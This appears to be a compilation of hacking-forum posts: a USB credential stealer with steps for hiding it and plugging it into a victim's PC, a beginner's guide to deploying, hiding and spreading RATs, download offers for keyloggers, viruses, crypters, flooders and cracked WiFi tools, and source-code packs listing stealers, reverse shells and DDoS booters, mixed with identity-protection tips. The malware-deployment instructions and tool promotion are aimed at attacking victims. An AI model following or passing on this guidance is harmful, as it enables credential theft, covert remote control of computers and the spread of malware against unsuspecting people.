USB Thief Modified

USB Thief Modified

Came across this tool and thought id share.

USB Thief Modified

--------------------------------
|************************
|* USBThief_Modified_by_NEO *|
|************************
|************************
|* JUST PLUG IT AND NJOY *|
|************************
--------------------------------

USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Instructions:
1.Decompress the archive and put all the files located in the folder "COPY"into a USB.
2.now run the file "hideh.bat"(this makes the files totaly hiden which can not be seen even using show hide option).
3.now delete the fie "hideh.bat"

-----------------------------------------------
-----------NOW UR READY FOR WORK-----------
-----------------------------------------------
Wht Next??---Simple
just plug the USB drive into victims pc open up wait for 4 sec and done...


----------------------------------------------
-----------HOW TO SEE THE DATA?------------
----------------------------------------------

When u decompressed the archive it created folder named "USBThief_Modified_by_NEO"
go in it
there will b file "showh.bat"
just copy it to usb and double click on it
now refresh
and u will see the all folders in USB
open "IMNeoWorld"
done,,,there u r .. got it??



---------------------------------
----------- FEATURE ------------
---------------------------------

Visited Links List
Internet Explorer Cache List
Internet Explorer Passwords List
Instant Messengers Accounts List
Installed Windows Updates List
Mozilla Cache List
Cookies List
Mozilla History List
Instant Messengers Accounts List
Search Queries List
Adapters Report
Network Passwords List
TCP/UDP Ports List
Product Key List
Protected Storage Passwords List
PST Passwords List
Startup Programs List
Video Cache List

download:

Code:
http://adf.ly/1DEqb

How to protect your identity online [Part 2][Extremely DETAILED]

4) Your e-mail

Your e-mail, the one you use to check on your everyday business or activities online. The one you rely to deliver things to you safely.

Question is, are you delivering to it safely? Probably not, or at least I hope you are.

The e-mail problem is an easy fix since all it takes is common sense.

If you have various accounts such as Social networks, have an e-mail specifically for messing around. If you have accounts for serious business such as your Paypal, Bank, etc...

Have an e-mail that only you have access to and is different from your regular "messing around" e-mail.

If you work for any companies or have services with an ISP, avoid using their e-mail services to register on important websites where your money is dealt with such as Paypal, AlertMoney, banks, etc...

Why? Because they have been known to get hacked leaving all your information exposed for hackers to gorge in. Instead, I would recommend focusing on big companies such as Yahoo, Hotmail, or Gmail since these are much more secured companies and will always be up 24/7 any time of the year.

Not much to say on that, just have different e-mails for different activities for security measures. Not only that, but also have different passwords that require extensive typing with various complicating symbols such as:

you%(3cool

That above is a ridiculous example, but I believe you get the idea.

You know what hackers love the most? Not having to do much work and having everything set for them easily for the taking. For example, if you are infected with a keylogger, a hacker would love to have 1 e-mail to have access to everything. So, this gives you an idea why you should have a variety at all times with up-to-date information to assure that you could retrieve it, in case if it were to get stolen.


5) What you sign up to
Ever wondered why you get so much spam e-mails? Well, it's simple. It's because e-mail collectors acquire a list of e-mails in which they can mass e-mail to send spam.

Just as I mentioned earlier, have an e-mail for messing around and e-mails for serious business. Avoid using an e-mail for all activities as this will only clog your inbox with useless e-mails that will steal your valuable time.

There are many websites which sell their database of e-mails to E-mail spammers for a certain amount of money behind the scenes or the collectors themselves have set traps through the internet such as Phishing to acquire a list of e-mails to spam.

Avoid registering to websites such as products and random useless subjects that promise to pay you money for signing up or trying their products.

Seems to me like it's common sense, but it's good to know.



6) Information you expose unknowingly

Well, I hope that I have given you a good idea of easily information can be acquired using the internet.

Privacy does not exists anymore on the internet.

If you use Social Networks, try to have your information concealed as much as possible from the public and do not expose valuable information such as Birthday, location, or name to keep yourself as underground as possible.

You have to consider that information could be leaked physically or electronically as well.

Keep yourself up-to-date and informed to know if a company you might use has been breached or not.

http://en.wikipedia.org/wiki/Timeline_of...er_history

As they say, Google is your friend. Use it when you need it.


7) Keeping you safe

This is probably the most important part of the tutorial as this is where the most incidents occur due to infections or traps.

Infections or traps can range from:

-RATs (Remote Access Tool) which essentially give completely control of your computer.

-Keylogging which retains a log of all the keys you ever press on your keyboard.

-Phishing which retains a log when you manually input your information on a fake website emulating an original website.

-And more, but those above are the most common.

How can you protect yourself?

Around 90% of malware on the internet was coded to infect Windows Operating systems. I got that number from PC World about a year ago, forgive me if it's incorrect now.

Anyway, assuming that you run on Windows you are the ones are the highest risk of getting targeted or infected.

You will want to always have your computer clean and secured having the proper tools. All these tools are the best of the best and are all free. They are probably better than paid security software.

How do I know this? Well, there are websites where you can scan malware after you crypt them (making them undetectable) to ensure that they are not detected by Anti-virus of any kind. Avira is the one that people always have a hard time bypassing, so I can safely say that it's the best from my personal experience of crypting and scanning.

Download and install all these tools below and I can assure you that your computer will be protected 1000% better than what it might be as of now. Get the free versions.

http://www.malwarebytes.org/

http://personalfirewall.comodo.com/

Avira Anti-Virus - Follow the instructions on that link on how to get it free.

KeyScrambler Pro 2.7 - Follow the instructions on that link on how to get it for free. This software helps to encrypt everything you type on the internet.

If you use Google Chrome, get this:

https://chrome.google.com/extensions/det...ckof?hl=en

It encrypts all your website visits as https:// rather than http:// which makes you more secured.

If you use Firefox, get this:

http://www.eff.org/https-everywhere

It encrypts all your website visits as https:// rather than http:// which makes you more secured as well.

http://notendur.hi.is/~gas15/FireShepherd/

FireShepherd, a small console program that floods the nearby wireless network with packets designed to turn off FireSheep, effectively shutting down nearby FireSheep programs every 0.5 sec or so, making you and the people around you secure from most people using FireSheep.
The program kills the current version of FireSheep running nearby, but the user is still in danger of all other session hijacking mechanisms. Do not do anything over a untrusted network that you cannot share with everyone.
-Know that this is only a temporary solution to the FireSheep problem, created to give people the chance to secure themselves and the others around them from the current threat, while the security vulnerabilities revealed by FireSheep are being fixed.

The other option is using a different operating system which has a lower percentage of being targeted.

You don't have to spend tons of money on Apple computers, instead you can get a free operating system from the Linux distributions.

The easiest to use and most similar to Windows looks is Ubuntu. You can install Ubuntu as a normal program on Windows and once it restarts, it shows you the option to choose Ubuntu over Windows.

You can watch this video:

http://www.youtube.com/watch?v=UdI8_92QTkQ

To learn more in dept. It's very simple, so don't be afraid to try.

The video focuses on completely replacing your current operating system Windows and replacing it or dual booting with Linux Ubuntu.

If you are a noobie, I would recommend you stop at the part where he goes to:

Wubi Installer - Ubuntu

It's as simple as going Next, next, next on any normal installation and whenever you restart your computer, it will ask you to choose either Ubuntu or Windows.

Running under a Linux distribution will put you at around a 2-5% of getting infected with anything. Not only is Linux good, but you don't have to worry much about installing anti-virus or anti-malware software to keep your computer clean and running.

I have been running on Backtrack 4 R2, a Linux Distribution and I can tell you that I have NEVER been infected.


Well, I believe this is all I have to say.

I hope you guys learn something from this new tutorial.

RAT(Remote Administration Tool) Guide For Beginners- Q&A. Explained

Remote Administrator Tools Q & A.

Q – Whats RAT?
A – A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.
Q – How they work?
A - Some RATs can spread over P2P file sharing programs(uTorrent, Pirate Bay etc.), Messangers spams(MSN, Skype, AIM etc.).
Q – Download?
A – Well you can find any type of RAT here, on beginnershacking.wordpress.com. To download.  and you will find some links. Also, you can buy FUD private version of RAT: Albertino RAT, Medusa Rat, jRAT etc. Also you will need DNS host for your RAT.
Q – How do I control server?
A - Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.
Q – What do I need to setup RAT?
A - Well, you will need Windows OS, open port & RAT. To forward your port scroll for tutorial link or click this URL.

Q – How do I port forward?

A – Port forwarding is easy and important for RAT. Well, you need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter(write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port

Q – How do I make my server FUD?

A - If you want to make your server FUD again, you will need crypter(you can find free FUD one here.). Also, you can hex edit your server, but be careful some servers can crash after hex editing, any way check out this cool tutorial How to make FUD with hex editing.
Q – How do I remove server if I infect myself?
A - When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. Well there is another way, download MalwareBytes’ Anti-Malware and scan whole computer for Trojan.
Q – Legal or illegal?
A - Well some RATs are legal, and some are not. Legal are the one without backdoor left, and they have abillity to close connection anytime. Illegal are used for hacking and they can steal data(Credit Cards, Passwords, private data etc.).
Legal:
  • TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
  • UltraVNC – Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance
  • Ammyy Admin – Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote
  • Mikogo – Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.
Illegal:
  • Spy-Net
  • Cerberus Rat
  • CyberGate Rat
  • SubSeven
  • Turkojan
  • ProRat
To Download This RAT’s  Click Here
Q – Where and how do I spread?
A – There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites(uTorrent, Pirate bay etc.), YouTube etc. Well some people use custom made Auto-Spreaders programs to spread their server. But best and most effective way to spread is when you FUD your server.

Q – Whats DNS host?

A - The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.
Q – What can RAT do?
A – Here is list of basic features:
    • Manage files • Control web browser(Change homepage, open site etc.) • Get system informations(OS Version, AV name, Ram Memory, Computer name etc.) • Get passwords, credit card numbers or private data etc. • View and remote control desktop • Record camera & sound • Control mouse • Delete, rename, download, upload or move files
Q – What’s reverse Connection?
A - A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.
Q – Whats direct connection?
A - A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.
Q – Can I get traced when I rat somebody?
A – Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace, because PC usually got over 300 connections. So don’t worry.
Direct connection:
Code:
[Client]
|    [Client]
|      /
|     /
|    /
|   /
[Server]-----[Client]

Ultimate® Wireless Hacking Guide For Beginners With Commview For WiFi

CommView®
CommView is a powerful network monitor and analyzer designed for LAN administrators, security professionals, network programmers, home users…virtually anyone who wants a full picture of the traffic flowing through a PC or LAN segment. Loaded with many user-friendly features, CommView combines performance and flexibility with an ease of use unmatched in the industry. In this thread I will provide you with software download and Manual on how to do it all by yourself! This is the one and only most noob proof guide ever made! You will be able to hack any W-LAN in your range with ease and safety. The software provided is cracked and not infected anyhow.
[Image: b1486ecd9d485e6e0c1aaa85376617e8.png]
This application captures every packet on the wire to display important information such as a list of packets and network connections, vital statistics, protocol distribution charts, and so on. You can examine, save, filter, import and export captured packets, view protocol decodes down to the lowest layer with full analysis of over 70 widespread protocols. With this information, CommView can help you pinpoint network problems and troubleshoot software and hardware.
How can a network analyzer help me?
If you are a seasoned professional, you definitely know the answer. Managing a LAN, creating network-oriented software, or performing a security audit have one thing in common: You’re blind without a good network monitor. Every day, it helps you maintain efficient network data transmission, test firewalls and intrusion detection systems, or identify problems with network-based applications. And there is an important economic reason behind using a network analyzer: it costs a fraction of the price of information, time, software, and hardware that may potentially be lost or wasted by not using a network analyzer. A number of case studies describe real-world applications of CommView in business, government, and education sectors.
If you are new to networking, you’ll find CommView extremely useful for understanding how the Internet and your LAN work. Being a network analyzer (also commonly referred to as a packet analyzer, network monitor, or packet sniffer), it captures and decodes network traffic and makes sense of it, allowing you to see what, where, and how information leaves and enters your computer — which is critically important for a secure Internet experience. The Online Tutorial is an excellent resource for learning about the many exciting features CommView offers.

What you can do with CommView:

* View detailed IP connections statistics: IP addresses, ports, sessions, etc.
* Reconstruct TCP sessions.
* Map packets to the application that is sending or receiving them.
* View protocols distribution, bandwidth utilization, and network nodes charts and tables.
* Generate traffic reports in real time.
* Browse captured and decoded packets in real time.
* Search for strings or hex data in captured packet contents.
* Import and export packets in Sniffer®, EtherPeek™, AiroPeek™, Observer®, NetMon, and Tcpdump formats, export packets in hex and text formats.
* Configure alarms that can notify you about important events, such as suspicious packets, high bandwidth utilization, unknown addresses, etc.
* Create your own plug-ins for decoding any protocol.
* Exchange data with your application over TCP/IP.
* Export any IP address to SmartWhois for quick, easy IP lookup.
* Capture loopback traffic (a new, unique feature in version 4.1).
Commview Download:
http://www.mediafire.com/?j2vntwidnmk <—Install it and crack it as any other application.
Wireless Hacking Plug in + Manual Download:
http://www.mediafire.com/?j2uuymzw3mt <— Run the application and read the manual to help you with process

Wifi Hack Tools (27 Tools) + Manual (e-Books) Free Download

[Image: 1299404578.jpg]
The Best of Wifi Hack Tools (27 Tools) + Manual (e-Books) | 82.20 Mb
The best collection of 27 programs for hacking WiFi
Hacks page 1:
- Comm View for WiFi v5.2484
- Pure NetWorks NetWork Magic 2
- Air
- AP Sniff
- Comm View
- Aerosol
- Easy WiFi Radar
- Boingo Wireless
- and more ....

Hacks page 2:
- Get Wep Key Of Encrypted Wireless Connection
- WiFi Companion v2.10.4
- Net Stumbler
- WiFi Hack Tools
- WiFi Internet Access Blocker
- iPig WiFi HotSpot VPN Security

Hacks page 3:
- Hot Spotter v0.4
- Kismet
- WDG
- AirShort v0.2.7e
- WiFi Hopper v1.2
- Wireless NetWork Ignition
- Wepwedgie - alpha
- Wep hacking

Plus e-Books:
- O-Reilly Wireless Hacks
- System hacking 2k
- FBI Teaches how to break WiFi
- Collection of Hacking Dictionary
- How to hack WEP

Post here to get links PMed to you.

Link scan: http://vscan.novirusthanks.org/analysis/...yLWh0bWw=/

Report date: 2011-03-06 11:22:55 (GMT 1)
File name: wfh27-rar-html
File size: 17676 bytes
MD5 hash: 5ea28e2a1fce77d865145256dfe288d3
SHA1 hash: df3012a7d55cc8213a9bc201c6f3aa8c74ed9cbe
Detection rate: 0 on 9 (0%)
Status: CLEAN
Antivirus Database Engine Result
a-squared 06/03/2011 5.1.0.2
Avast 06/03/2011 5.0
AVG 06/03/2011 10.0.0.1190
ClamAV 06/03/2011 0.97
Comodo 06/03/2011 4.0
F-PROT6 06/03/2011 6.3.3.4884
Ikarus T3 06/03/2011 1001097
TrendMicro 06/03/2011 9.200.0.1012
Zoner 06/03/2011 0.2
Extra information
File type: Unknown file
Packer: Nothing found
Binder detector: Nothing found
PDF analyzer: Nothing found

Couldn't scan the entire file cause it's over 20MB. I take no credit for the uploading of the file.

Here are the download links...

http://adf.ly/17u3I
OR
http://adf.ly/17u4L

How to protect your identity online [Part 1] [Extremely DETAILED]



The information I will provide might make you paranoid by the time you are done reading this, so if you don't want to be informed and paranoid, please don't read this.

I will be covering:

1) History - Hackers
2) Website owners
3) Your name
4) Your e-mail
5) What you sign up to
6) Information you expose unknowingly
7) Keeping you safe


You hear it on the news, you read it on the newspaper, you live with it everywhere without even acknowledging its existence.

"Hackers have stolen identities" I have heard that line so many times this year, it is ridiculous.

Companies promising to "defend" your identity, memberships giving their words to keep your information to themselves only, the government reassuring that they will only have access.

All this is a lie as information ALWAYS gets leaked or there is an inside worker providing information out into the black market.
Not only that, but securities on big companies are always exposed and hackers always find their way in.


1) History - Hackers

I will explain briefly on the type of hackers that there are out there for the sake of academical knowledge. These descriptions are not in dept, instead they are meant to slightly touch the subject and educate those are who are unaware of these titles on the cyber world.

1) Black Hat Hackers - These are the most infamous hackers there are. These are the guys you hear about it on the news due to committing crimes. These people are whose purpose is to gain information and use for their own need. They could be anyone.

-Black Hats tend to be professionals at what they do and are extremely well informed on everything related with the cyber world and crimes.
-Black Hats tend to be educated people who have worked many years to accumulate all the knowledge they hold. They are not your kid who uses "hacking tools" to scare their gaming buddies online.
-Black Hats is the image typically portrayed on movies.

2) White Hat Hackers - These are the lesser known hackers simply because they do the clean up work that goes behind the scenes cleaning up the messes from Black Hat Hackers.

-White Hats are the heroes of the cyber world. They fight crime using their hacking knowledge to patch exploits on system and assure that your information does not gets leaked out or easily acquired by any Black Hats.
-White Hats are professionals at what they do. They have as much knowledge as Black Hats, but use their skills to fight crime rather than aid it.

3) Gray Hat Hackers - These are the somewhat known hackers simply because they are unpredictable on what their actions might turn into. They are known as "Gray Hats" because it's a mixture between the color White + Black = Creating: Gray

-Gray Hats are essentially neutrals on what they do. They might decide to do what's right even if there's some other entity telling them that it's wrong or could be vice versa.

For example, Black Hat steals bank information and leaks out on the internet. Gray Hat could either decide to either use the information OR let the owners, authorities, or the companies know of the exposure.



2) Website owners

Websites, there are millions of them around the world in all languages. You can keep yourself entertained on them or you can become smarter reading potential useful information as you are reading now. Thumbsup

Do you ever wonder "Who owns this website?" or "How can I find out who owns it?"

I decided to include this topic on here since more and more people decide to pay for hosting services to have their very own website for either personal usage or some sort of business.

Well, unlike in the real world where you fill out papers and they get stacked or hidden in some compartment where not a random person could have access. Websites expose your information unknowingly. Maybe not the websites themselves, but the companies that provide hosting services.

I will use this website "HackForums.net" as an example to teach what I'm talking about.

There is something known as a "whois" that essentially tells you who registered the domain name.

You can easily Google "whois domain" and a huge list of websites that allow you to whois either a location or a domain to find its location.

My favorite website to do whois is:

http://whois.domaintools.com/

Now, if we do a whois on HackForums.net, here's what we get.


Quote:Domain Name: HACKFORUMS.NET
Registrar: MONIKER

Registrant [2341726]:
Moniker Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Administrative Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US
Phone: +1.9549848445
Fax: +1.9549699155

Billing Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US
Phone: +1.9549848445
Fax: +1.9549699155

Technical Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US
Phone: +1.9549848445
Fax: +1.9549699155

Domain servers in listed order:

NS1.DALLAS-IDC.COM
NS2.DALLAS-IDC.COM
NS1.ZANMO.COM 69.162.82.250

Record created on: 2005-09-27 14:18:41.0
Database last updated on: 2010-11-29 02:16:59.78
Domain Expires on: 2011-09-27 14:18:41.0

As you can see it exposes a lot of information that you wouldn't want strangers to get a hold of you and then use to sell for their own good.

  Common Hacking Forums, Websites are registered as a "Private" domain, so no real information is shown of the real owner. Instead, it displays the information of the company providing the service for the domain or hosting.

This is also how you can contact a company if you want to report a website with disgusting content such as child pornography.

I'm not going to whois a person's website since it would be against the rules to expose personal information about anyone, but I believe that you get the idea of what can be done to discover information such as address, name, phone number, fax number, and more using nothing but a website name.

Experienced website administrators always should use Private domains to avoid exposing information to the public as much as possible.

If you have a website, whois it yourself and find out whether if you are exposed or not. If you are, call the company you registered your domain and request your domain to be put as private. They might require a fee of around $7 extra a year, but it's worth it knowing that you're not exposed.

You could also find out the ISP or company by doing a ping on an IP.

Example,

Open Command Prompt and type "ping Hackforums.net" the response will be an IP. Once you have that IP, you can use:

http://iplocation.net/

To tell you where the servers are located and giving you a definite location for the company's machines.

http://iplocation.net/ Can also be used to find the location of a person's location with their IP.


3) Your name

Your name is as unique as you can be. Your parents/guardians named you and that's what makes you, you.

Your name can be your worst enemy when you are online as it can be used to expose so much information about you to the point of where you could be blackmailed.

Where should you ever use your real name online? NEVER. Why? Because, using your name alone anyone can find out where you live within a matter of 5 seconds.

Websites such as:

http://com.lullar.com/

http://www.pipl.com/email/

http://www.spokeo.com

http://www.emailfinder.com

http://www.411.com/
http://www.ask.com/
http://www.bebo.com/
http://www.facebook.com/
http://www.flickr.com/
http://www.ip-adress.com/ipaddresstolocation/
http://www.myspace.com/
http://www.myyearbook.com/
http://www.searchenginez.com/findpeople.html
http://www.skipease.com/
http://www.sonico.com/
http://www.spock.com/
http://www.twitter.com/
http://www.usatrace.com/
http://www.whitepages.com
http://www.whois.com/
http://www.whois.net/
http://www.wink.com/
http://www.youtube.com
http://www.zabasearch.com/
http://www.zoominfo.com

Make it extremely easy to search names, e-mails, etc to dig information about whoever you want. There are more websites in which I personally use to dig information about people, but I will not mention them since I do not want the news station going crazy on a new rage of identity exposers.


Here's an example of a person I searched for the sake of showing.
[Image: identity.png]

I have satellite pictures using Google Earth to pinpoint exactly where she lives and what her house looks like, but I will not expose that.

Where is this information normally exposed? Hmm...I'll let you guess. Or maybe not...The answer is Social Networks. Ah, Facebook, Myspace, Orkut, and so many others...The list goes on and on.

I highly recommend that you NEVER use your real name, instead use an edited name or initials instead rather than exposing your real name to the real world. If your friends on social networks already know you, they should not need to see your complete name as they will already know you.

For example,

Bill Gates

My recommendation would be to use "Billy Gates" simply because a letter being off makes it so incredibly difficult to pinpoint someone.

You can use your imagination for what you should replace your name instead of your real name. That is, if you want to avoid being looked up.

Something I have found based on experience is that it's much more difficult pinpointing teenagers on the internet since they are not normally registered with government database that eases finding them.

If you are a teenager, do not have your parents names exposed as the name of your parents can be used to pinpoint you or vice versa, if you are a parent. Ironically, it's the teenagers that expose more information than adults and yet, they are the ones harder to pinpoint.

Grieve Logger Public V2.3 Free Download!

Screenshot:
[Image: BCTh2.png]
[Image: l5ojc.png]

Features:
  • 100% FUD
  • Use Any E-Mail Provider For Your Logs
  • Kill Task Manager
  • Add To Start Up
  • Custom Start Up Name
  • Hide File After Execution
  • Block Anti-Virus Sites
  • Icon Changer
  • CodeDOM Compiled
  • Each Server Is Different
  • Mutex
  • Fast Execution

Scans:

Builder:

Built Server:

Download Link:
http://www.mediafire.com/?dhu3isvcqdme1by

Password:
Code:
Vr3DE+B4z+zYwxPYtblzBdKc8NAMCWfWCIYPqgwhAJ24wFQkyrAywgKLXRnSy8wzBzODf8BefWy4wxQY ​ CLOzgRlL8I1TVFZOB83iB09e3JqY0AQKvdfJ3TKLyLJrXAfaVe3I38B4z+zYwxP6yLQSfdKc8NAMCWfW ​ CI5rqgwhAJ24wFQPyblywgKLXMJ6VFfsBzODf8Be3J3rzMfYCLOzgRlL8I1MwAZOB83itecdzJ/Y0AQKvdfefdf08uJrXAfaVr3DwNCOz+zYwxP6yLCy0gKc8NAMCWfWCKciqgwhAJ24frv6vrAywgKLXRn ​Sy8w=BzODf8Be3JqxESlv

Encrypted With:
FERON-74 -> ZARA-128 -> MEGAN35 -> TIGO3FX -> GILA7

Ignore Any Errors In Decoding.

Subscribe On This Blog To Get Password & Comment on this post to get password!

Free Online SMS Worldwide ( without any registration, Unlimited, No Adv)



Free SMS Worldwide Services No Registration Required! No Advertisement, Unlimited

Links:






The Most Dangerous Hack Tools Ready For Download



Trojan Horses
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
More...

Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy

Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner

WebHacks/WordLists

Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix

CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner

Virus!

Viruses
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ

Virus Builders
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus

MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger

Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack

Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2

EXTRA!
- Telnet Tutorial

http://rapidshare.com/files/105797649/Ul...K_EXOR.rar

Be Careful As There is A lot of Very Dangerous Tools in That Pack

Password = crazy-coderz.net

[C#] Collection of Source Codes [MEGA PACK]

Hello,

Here's a lot of source codes for C# programming language I collected. Most of sources are already posted in here, but it'd be hard to find for new comers, so that is why I made a pack. :)

This pack includes the following source codes:
Script Maker
Image Converter
Notepad
USB/P2P/MSN Spreader
Email Bomber
Auto Typer
C# RAT FULL Source
Icon Changer
Webcame Capture
4chan Spammer FULL Source
Website Source Grabber
Task Manager
Startup Watcher
Stasi Bot Lite V1.0 (WebPanel Bot)
Shortcut Manager
Shell Booter
Screenshot Capture
Serial Number Generator
Rocket Mission
Scantime+Runtime Crypter
Read and Write
Process Explorer
Port Scanner
PrintScreen+
Pop and SMTP Mail Application
Picture Viewer
Picture Editor
n0pe Bot (WebPanel Bot)
Kill Processes in Task Manager
kBot (IRC Bot)
HTML to CSV Converter
GMail Email Sender
Firefox&FileZilla files Stealer
File Splitter and Joiner
File Pumper
Firefox and FileZilla Stealer to FTP
Excel to CVS Converter
Custom Wallpaper
File Cloner
Create .ZIP files from .NET Applications
Blaster Master (Video Game)
Create a new folder
Reverse Shell
Basic Downloader & Execute
RAT (Server only)
Port Binding Shell

Download link:
http://uploading.com/files/mc13a345/C%2523%2BPack.rar/

[VB.NET] Collection of Source Codes [MEGA PACK]

Hello Friends,

I've downloaded lots of source codes while I was learning basics, so I though of sharing them! Some of them might be already posted here, but I wanted to make a collection in one post, so people don't have to waste time to search.

This pack includes the following source codes:
Alart Clock
Email Sending
Mp3 Player
MSN Messenger Portable
NoVirusThanks Scanner
Send Text Message - SMS
VB DotNet PortScanner
Web Browser (with tabs, a good one)
Shutdown Timer
AES Crypter
Google Engine v1
MSN Freezer
Deface Page Generator
GMail (Download GMail Contacts)
File Info Grabber
Nuke1 Source (Multi Bombers - GMail, AOL, Yahoo, Hotmail)
WoW Account Hacker (FAKE)
Phoenix Keyogger
Omegle Spreader
iWelcome (mIRC Bot)
MD5 Grabber
Check Internet
HTTP Flood
Youtube Downloader
Update System
Icon Changer
Hash Cracker
File Cloner
Licence (Make your program require a licence key to run)
Basic RAT
Screenshot
Downloader (File Injector)
Windows 7 KeyGen (Fake)
Screen Capture
Notepad
Fake Error & Downloader
Computer Information (Part 1,2,3,4)
Keylogger (Basic)
1337 v2.0
On The Fly FUD
Batch Virus Gen
Error Creator
Enable disable XP firewall
Anti's
XP Info
A+ Binder
Cyber Spammer
E-mail Smoker
72389 Downloader
72389 Bomber
72389 Binder
Ping
UDP Flood
Weekend Binder
Search
Scantime Crypter
Multi File Binder
MP3 Search
Mini Email Bomber
Pump it up!
Nathan's Binder
Google it!
Hotmail Email Bomber
Binder Example
Bomb Them - Email Bomber
Dark Downloader
MSN Style Alert
Web Browser with Proxy
Rotating Label
Local&Unlock app
Label Banner
Save settings
HTTP up and down
GD Pool Assastant
Revenge Bomber
Encrypt a text File with RC4
RC4 Encrypted Text
RC4
XOR Encryption
Triple des
Load file into memory
FTP Revenge
FTP Folder Watch
Chat Spammer
Backgroundworker and progressbar
Easy Screen Capture
Dropping a Resource
Filler up 2.5
Web Browser
Simple Binder
72389 FF Pass stealer
Brute forcer (Needs Work)
Builders 101
Embeded sound
72389 command line gmailer

Download link:
http://www.mediafire.com/?ynukuzxokjz


Credit: flAmingw0rm

[VB6] Collection of Source Codes [MEGA PACK]

Hello,

This is my second pack with source codes coded in VB6. This pack includes many source codes, such as Keyloggers, Crypters, Binders, Host Booters and so on.

Anti Viruses & Firewalls:
- Advanced Firewall
- Anti Trojan
- Antivirus
- BG Antivirus
- FTP API Update
- Simulanics AV
- vn Antivirus

Downloaders:
- d3xter's Downloader
- Downloader Example
- Fast Downloader

Host Booters:
- BBO v2
- BioZombie
- Epidemic DDoSER
- GB v3
- Metus v1.7
- Metus v2.0
- Mini DoS
- SCB Lab's Botnet
- Zombie Slayer V1

IRC:
- 539 IRC Bot
- dexbot
- Fudsonly Botnet Plus Version 1.0
- vBot

Keyloggers:
- Digital Keylogger v2
- Digital Keylogger v3
- JackoLogger v2.0
- Keylogger
- Yahoo Keylogger

Mess Tools:
- Anonymous E-Mail Sender with attachments
- Yahoo Answer
- Azarie
- Mod MSN
- MSN Status Changer
- MSN Password Stealer
- Multi Messenger
- Yahoo Manager
- Yahoo Member Search
- Yahoo ID Deleter
- Yahoo ID Creator
- Yahoo ID Locker
- Other Yahoo Source Codes

RATs (Remote Administrative Tools):
- Aqua
- Black Dream
- Diamond Wireless Remote Admin
- Dis Magoor 1.0.0
- DSK v1
- Egypt
- G-Hack
- GoodLuck 3.0 FULL
- Handle-X RAT
- Intruder
- Messiah V2.0
- Minimo
- Net Trash
- Network Spy
- Nirvana
- Omega v1.1
- OpenDC Beta
- Rage 1.0
- Revenger
- Sequel
- ShareADD
- Shark V2.1 RAT
- Shell
- Simplu
- Ullysse
- Ultra Spy
- Unexplained 1.0
- YellowKoza - LAN&Internet Trojan
- YuDeePee RAT

Stealers:
- Basic Stealer
- Chrome Stealer
- En/Decrypt AIM Passes
- FireFox 3.5.x
- FireFox Stealer Source
- Firefox Password Recovery
- FireSteal
- Get Pidgin
- ICQ 6+7 Password Stealer
- IMVU
- Mozilla Firefox Password Stealer
- MSN Password Stealer
- MSN Password Recovery
